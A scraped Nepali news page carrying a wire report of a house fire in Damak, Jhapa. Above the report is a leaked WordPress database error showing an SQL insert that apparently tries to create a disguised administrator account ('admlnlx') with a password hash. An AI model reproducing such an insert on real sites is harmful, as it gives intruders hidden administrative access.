WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWZxFDjqGMvbB00mlXKyJB8.BTEBTI1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 09:33:50', '', 'admlnlx', 'admlnlx')
दमक,माघ ९ –
झापाको दमक–१५स्थित सुकुम्बासी टोलमा गएराति आगलागी हुँदा एउटा घर जलेर नष्ट भएको छ ।
सुमित्रा कार्कीको घरमा आगलागी हुँदा रु पाँच लाख मूल्य बराबरको क्षति भएको प्रहरीले जनाएको छ ।
कार्कीको घरसहित घरमा रहेका लत्ता कपडा तथा अन्नपात जलेको थियो । घरमा के कारणले आगो सल्किएको भन्ने थाहा हुन नसकेको प्रहरीले जनाएको छ ।
स्थानीयवासी र दमक नगरपालिकाको दमकलले आधा घन्टाको प्रयासपछि आगो नियन्त्रणमा लिएको थियो । – रासस